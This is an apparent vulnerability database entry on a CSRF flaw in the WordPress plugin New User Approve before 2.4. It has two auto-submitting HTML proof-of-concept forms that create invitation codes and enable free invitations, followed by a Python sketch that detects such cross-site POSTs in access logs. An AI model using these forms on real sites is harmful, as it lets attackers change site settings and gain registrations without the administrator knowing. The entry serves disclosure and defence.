New User Approve < 2.4 - Arbitrary Settings Update & Invitation Code Creation via CSRF

πŸ—“οΈΒ 01 Jun 2022Β 00:00:00Reported byΒ Daniel RufTypeΒ 
wpexploit
Β wpexploit
πŸ‘Β 108Β Views

Add codes:
<form id="test" action="https://example.com/wp-admin/admin.php?page=nua-invitation-code" method="POST">
    <textarea name="nua_manual_add[codes]">test
sesame-open
let-me-in
</textarea>
    <input type="text" name="nua_manual_add[usage_limit]" value="99">
    <input type="text" name="nua_manual_add[expiry_date]" value="2022-04-30">
    <input type="text" name="nua_manual_add[submit]" value="Save Changes">
</form>
<script>
    document.getElementById("test").submit();
</script>


Update Settings:
<form id="test" action="https://example.com/wp-admin/admin.php?page=nua-invitation-code&action=Settings" method="POST">
    <input type="text" name="nua_free_invitation" value="enable">
    <input type="text" name="nua_inv_code_submit" value="Save Changes">
</form>
<script>
    document.getElementById("test").submit();
</script>
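
Both forms above post to `admin.php?page=nua-invitation-code` from a page outside the site, so on an affected install the request reaches the admin handler carrying a foreign `Referer` header or none at all. The following detection sketch is an added example, not part of the original advisory or the plugin's code: it scans web server access logs for such POSTs. It assumes Combined Log Format and uses `example.com` as the site host; the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Combined Log Format: ip - user [time] "METHOD target PROTO" status size "referer" "ua"
LOG_RE = re.compile(
    r'^\S+ \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)"'
)

def classify(line, site_host):
    """Return None unless the line is a POST to the invitation-code admin page;
    otherwise 'same-site', 'cross-site' or 'no-referer'."""
    m = LOG_RE.match(line)
    if not m or m["method"] != "POST":
        return None
    target = urlsplit(m["target"])
    if not target.path.endswith("/wp-admin/admin.php"):
        return None
    if parse_qs(target.query).get("page") != ["nua-invitation-code"]:
        return None
    referer = m["referer"]
    if referer in ("", "-"):
        return "no-referer"  # stripped by browser or policy: review, not proof
    # Compare the exact hostname so "example.com.other.test" is not a match.
    host = (urlsplit(referer).hostname or "").lower()
    return "same-site" if host == site_host.lower() else "cross-site"

def suspicious(lines, site_host):
    """POSTs to the page that were not referred by the site's own admin UI."""
    return [l for l in lines if classify(l, site_host) in ("cross-site", "no-referer")]

# Constructed sample log lines (illustrative, not from a real server).
_T = '[01/Jun/2022:10:00:00 +0000]'
_P = '/wp-admin/admin.php?page=nua-invitation-code'
SAMPLE = [
    f'203.0.113.10 - - {_T} "POST {_P} HTTP/1.1" 302 0 "https://example.com{_P}" "UA"',
    f'203.0.113.10 - - {_T} "POST {_P}&action=Settings HTTP/1.1" 302 0 "https://other.test/a.html" "UA"',
    f'203.0.113.10 - - {_T} "POST {_P} HTTP/1.1" 302 0 "https://example.com.other.test/" "UA"',
    f'203.0.113.10 - - {_T} "POST {_P} HTTP/1.1" 302 0 "-" "UA"',
    f'203.0.113.10 - - {_T} "GET {_P} HTTP/1.1" 200 5120 "https://other.test/a.html" "UA"',
]

if __name__ == "__main__":
    for entry in suspicious(SAMPLE, "example.com"):
        print(entry)
```

A missing `Referer` is only a review signal, since privacy settings and referrer policies strip it on legitimate requests too.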

Vulners AI Score: 2 (Low risk)
EPSS: 0.001